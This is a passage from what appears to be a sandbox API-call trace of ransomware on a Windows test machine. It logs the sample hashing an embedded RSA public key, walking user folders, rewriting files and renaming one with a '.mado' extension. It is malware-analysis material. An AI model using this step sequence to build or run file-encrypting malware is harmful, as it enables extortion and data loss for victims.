KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.798] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.798] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.798] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.799] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.799] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.799] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.799] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.799] GetLastError () returned 0x0 [0204.799] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.799] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.799] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.799] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.799] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.800] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.800] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x115a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.800] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.800] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.800] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.800] CloseHandle (hObject=0x63c) returned 1 [0204.802] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YBOIpo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yboipo.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YBOIpo.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yboipo.m4a.mado")) returned 1 [0204.804] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6e0470, ftCreationTime.dwHighDateTime=0x1d5e5a8, ftLastAccessTime.dwLowDateTime=0xaea4bd00, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xaea4bd00, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x115a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBOIpo.m4a", cAlternateFileName="")) returned 0 [0204.804] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.805] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.805] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.805] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0204.805] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.805] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.805] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.805] PathFindFileNameW (pszPath="") returned="" [0204.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6e0470, ftCreationTime.dwHighDateTime=0x1d5e5a8, ftLastAccessTime.dwLowDateTime=0xaea4bd00, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xaea4bd00, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x115a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBOIpo.m4a", cAlternateFileName="")) returned 0xffffffff [0204.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff1f8 | out: hHeap=0x2c0000) returned 1 [0204.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.805] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.806] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0204.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.806] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.807] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.807] PathFindFileNameW (pszPath="") returned="" [0204.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6e0470, ftCreationTime.dwHighDateTime=0x1d5e5a8, ftLastAccessTime.dwLowDateTime=0xaea4bd00, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xaea4bd00, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x115a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBOIpo.m4a", cAlternateFileName="")) returned 0xffffffff [0204.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.807] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.807] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.807] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0204.807] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.807] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.807] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.807] PathFindFileNameW (pszPath="") returned="" [0204.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad377e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad377e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.807] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad377e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad377e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.807] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaee56e50, ftCreationTime.dwHighDateTime=0x1d5e32e, ftLastAccessTime.dwLowDateTime=0xf83bfd10, ftLastAccessTime.dwHighDateTime=0x1d5dae3, ftLastWriteTime.dwLowDateTime=0xf83bfd10, ftLastWriteTime.dwHighDateTime=0x1d5dae3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8522zzaC3XYMo_", cAlternateFileName="8522ZZ~1")) returned 1 [0204.807] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0204.808] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0204.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.808] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da960, ftCreationTime.dwHighDateTime=0x1d5dcf3, ftLastAccessTime.dwLowDateTime=0x78b67740, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0x78b67740, ftLastWriteTime.dwHighDateTime=0x1d5dcab, nFileSizeHigh=0x0, nFileSizeLow=0xa3c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NRTnKoCxG5zieJolr.bmp", cAlternateFileName="NRTNKO~1.BMP")) returned 1 [0204.808] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NRTnKoCxG5zieJolr.bmp") returned=".bmp" [0204.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NRTnKoCxG5zieJolr.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nrtnkocxg5ziejolr.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.808] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=41921) returned 1 [0204.809] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.811] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa39b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.811] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.812] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.812] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa3c1, lpOverlapped=0x0) returned 1 [0204.813] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.813] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.813] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.813] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0204.814] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.814] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.814] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.814] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.814] GetLastError () returned 0x0 [0204.814] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.814] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0204.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.814] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.814] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.815] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa3c0) returned 0x3b81690 [0204.815] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80db0 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80df8 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe520 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.815] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe520 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe520 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe4f0 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe4d8 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bb80 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bc98 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe520 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.816] GetCurrentThreadId () returned 0x600 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b72710 [0204.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.817] GetCurrentThreadId () returned 0x600 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 